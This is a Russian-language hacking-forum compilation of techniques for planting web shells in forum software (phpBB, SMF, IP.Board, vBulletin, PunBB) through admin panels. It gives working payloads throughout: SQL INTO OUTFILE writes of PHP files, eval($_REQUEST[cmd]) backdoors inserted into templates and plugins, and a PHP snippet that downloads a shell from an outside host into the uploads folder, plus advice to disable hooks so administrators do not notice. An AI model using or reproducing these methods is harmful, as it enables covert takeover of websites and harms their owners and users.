Заливка шелла в форумы
 

Собираем в одном месте способы заливки шелла в различные форумы.

PHPBB3
 

1. Разрешаем выполнение пхп в темплейтах. Устанавливаем галочку в Основные настройки(General Settings) -> Настройки безопасности(Security Settings) -> Разрешить выполнение пхп в темплейтах (Allow php in templates).
2. Далее в стилях выбираем необходимый темплейт и прописываем необходимый пхп код в следующей конструкции:

Заливка шелла в SMF 1.1.8 (возможно более рание и поздние версии) из админпанели:

у себя на компе предварительно суем обычный шелл в обычный .zip-архив (можно через тот же winrar, просто выбрать тип архива .zip)

например шелл называется wso.php, получили архив wso.zip

Идем в админку:

Configuration->Themes and Layout->Install a New Theme->выбираем наш wso.zip->Install

и шелл будет по адресу:

т.е. очевидно, что в папке Themes создается папка wso (по имени архива) и в нее распаковывается содержимое архива

Залитие шелла в IPB 3 из админпанели (тестилось на IPB 3.0.1 nulled):

способ 1:

вариант1:

Поддержка->Управление SQL->Выполняющиеся процессы->Выполнить новый запрос

select 0x3c3f706870696e666f28293b3f3e into outfile 'Z:/home/site.ru/www/uploads/shell.php'

полный путь можно посмотреть так:

->Поддержка, там будет сверху написана версия PHP и слева ссылка на PHP INFO

шелл: PS: Нужны соответствующие права

вариант2:

Форумы->Прикрепляемые файлы->Типы файлов

жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.

Топаем в свой профиль:

грузим аву-шелл с расширением php3 и получаем шелл по адресу:

=============================

способ 2:

Залитие шелла из админки IPB 3... (тестилось на IPB 3.0.1 nulled и 3.0.2-лицуха):

1. Ставим себе на локалхост IPB 3.0.1 к примеру нуленый

2. Идем в админку - Внешний вид - IP.Board - Настройки - смотрим "Директория с изображениями" - по дефолту "public/style_images/master"

3. Идем в нашу папочку (на примере Denwer)

и суем туда наш любимый wso2.php

4. Админка - Внешний вид - Импорт / Экспорт - Экспорт - Экспорт изображений - Какие изображения экспортировать? - IP.Board - Экспорт изображений - получаем архив images-master.xml.gz

5. В архиве файлик images-master.xml

Переименовываем архив! таким образом - обязательная процедура, иначе при попытке импорта на целевом сайте изображений стиля напишет "папка public/style_images/master уже существует!" - images-master2.xml.gz, название файлика в архиве сменится автоматом

6. Админка - Внешний вид - Импорт / Экспорт - Импорт - Импорт изображений - Загрузка XML-архива с изображениями - Обзор - images-master2.xml.gz - Импорт изображений

Рядом с

появится

где будет лежать все тоже самое, плюс наш шелл

в итоге шелл будет по адресу:

PS: не забудьте потом переместить шелл и удалить каталог master2

Готовый архив с картинками и шеллом можно взять тут , останется только изменить циферку

Заливка шелла в phpBB 2
 

Заливка шелла в phpBB 2.*


1. Создаём файл ex.sql
2. Прописываем туда
Где user_id=2 - идентификатор администратора

3. Заходим в админ-панель
4. В админ-панеле выбираем пункт "Восстановить БД" и загружаем ex.sql
5. Выполняем код / Заливаем шелл так

Заливка шелла в vBulletin.

В админке: Plugins & Products -> Plugin Manager -> [Add New Plugin]

вписываем eval($_REQUEST[cmd]); в любой темплейт, например в faq_complete, Plugin is Active выставляем "Yes" и сохраняем

шелл будет тут:

Заливка шелла в PunBB 1.2.17
admin_index.php -> Packager -> Export a language (Create a .tar.gz file in addition to the packag) -> грузим шелл (shell.php) запакованный в lang.tar.gz
шелл будет тут site.com/forum/lang/[имяфайла].php (shell.php)

Заливка шелла в IPB 3 (по мне так самая простая, но немного палевная, было лень переписывать нормально, ибо в хуках для ипб не разбираюсь особо=) ).
В общем идете в адмику далее модификации и там кнопка есть добавить модификацию(add hook)
туда вот это добавляешь http://slil.ru/29495625
идешь на главную страницу форума - там будет твой шелл причем с правами от юзера, который заливал файлы по фтп=)
заливаешь дальше куда нужно и отключаешь этот хук, чтобы не спалили

там залит eugen shell

Идём в "настройки" выбираем любую из них, жмём добавить новую настройку, и в поле "Выполнение PHP-кода
до отображения или сохранения настройки:" пишем любой php код, например такой:
-----------------------------------------
$linky="http://сайт_с_шеллом/shell.txt";
$saved="/home//www/123/forum/uploads/123.php";
$from=fopen("$linky","r");
$to=fopen("$saved","w");
while(!feof($from)){
$string=fgets($from,4096);
fputs($to,$string);
}
fclose($to);
echo 'done';
fclose($from);
-----------------------------------------

Этот способ меня всегда выручал)

IP.Board 2.3.6
[!] Везде нужны права админа, вы понеле?
Через SQL Запрос:
file_priv
('<?PHP eval($_GET[c]); ?>')
(Раскрыть путь можно здесь:Выполнение кода:
Работает только под Windows. Т.к. нужны права для записи на папку /sources/tasks/
Видео: https://rdot.org/forum/showpost.php?p=4811&postcount=2